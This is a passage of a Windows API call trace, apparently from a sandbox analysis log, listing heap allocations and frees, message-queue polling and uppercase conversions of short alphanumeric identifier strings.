RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0209.733] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0209.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0209.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0209.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0209.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0209.733] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0209.733] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0209.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0209.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0209.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0209.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0209.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.734] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0209.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0209.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0209.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.735] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0209.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0209.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0209.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0209.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.735] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0209.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0209.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0209.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0209.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0209.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.736] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0209.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0209.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0209.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0209.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.737] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0209.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0209.737] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0209.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa68 [0209.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0209.737] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0209.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0209.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0209.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0209.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0209.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0209.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0209.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0209.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0209.737] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0209.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0209.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0209.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0209.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0209.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0209.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0209.738] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0209.738] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0209.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0209.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0209.738] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0209.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0209.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74358 [0209.738] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0209.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0209.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0209.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0209.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0209.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0209.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0209.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0209.738] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0209.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0209.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0209.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0209.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0209.739] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0209.739] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0209.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0209.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0209.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0209.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0209.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0209.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0209.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0209.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0209.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0209.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0209.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0209.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0209.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0209.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0209.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0209.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0209.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0209.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0209.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0209.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0209.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0209.740] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0209.740] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0209.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0209.740] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0209.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0f8 [0209.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74598 [0209.740] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0209.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0209.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0209.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0209.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0209.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0209.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0209.741] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0209.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0209.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0209.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0209.741] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0209.741] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0209.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0209.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0209.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0209.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0209.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0209.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: 